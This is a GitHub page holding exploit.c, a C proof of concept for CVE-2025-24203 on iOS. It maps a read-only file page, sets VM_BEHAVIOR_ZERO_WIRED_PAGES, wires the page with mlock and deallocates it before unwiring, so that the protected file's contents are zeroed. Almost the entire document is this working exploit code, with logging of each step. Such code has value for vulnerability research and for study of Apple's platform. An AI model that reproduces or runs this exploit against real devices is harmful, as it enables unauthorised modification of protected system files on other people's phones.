CVE-2025-24203-iOS-Exploit-With-Error-Logging/exploit.c at main · GeoSn0w/CVE-2025-24203-iOS-Exploit-With-Error-Logging · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <errno.h>
#include <string.h>


void* map_file_page_ro(char* path, int* error_code) {
  int fd = open(path, O_RDONLY);

  if (fd == -1) {
    *error_code = errno;
    printf("open failed: %s\n", strerror(errno));
    return NULL;
  }

  void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);

  close(fd);

  if (mapped_at == MAP_FAILED) {
    *error_code = errno;
    printf("mmap failed: %s\n", strerror(errno));
    return NULL;
  }

  return mapped_at;
}


int poc(char *path) {
    kern_return_t kr;
    int error_code = 0;

    void* page = map_file_page_ro(path, &error_code);

    if (page == NULL) {
        return error_code ? error_code : 1;
    }

  printf("mapped file at 0x%016llx\n", (uint64_t)page);

  kr = vm_behavior_set(mach_task_self(),
                        (vm_address_t)page,
                        PAGE_SIZE,
                        VM_BEHAVIOR_ZERO_WIRED_PAGES);

  if (kr != KERN_SUCCESS) {
    printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES on the entry\n");
    return 2;
  }

  printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");

  int mlock_err = mlock(page, PAGE_SIZE);
  if (mlock_err != 0) {
    perror("mlock failed\n");
    return 3;
  }
  printf("mlock success\n");

  kr = vm_deallocate(mach_task_self(),
                     (vm_address_t)page,
                     PAGE_SIZE);
  if (kr != KERN_SUCCESS) {
    printf("vm_deallocate failed: %s\n", mach_error_string(kr));
    return 4;
  }
  printf("deleted map entries before unwiring\n");

  return 0;
}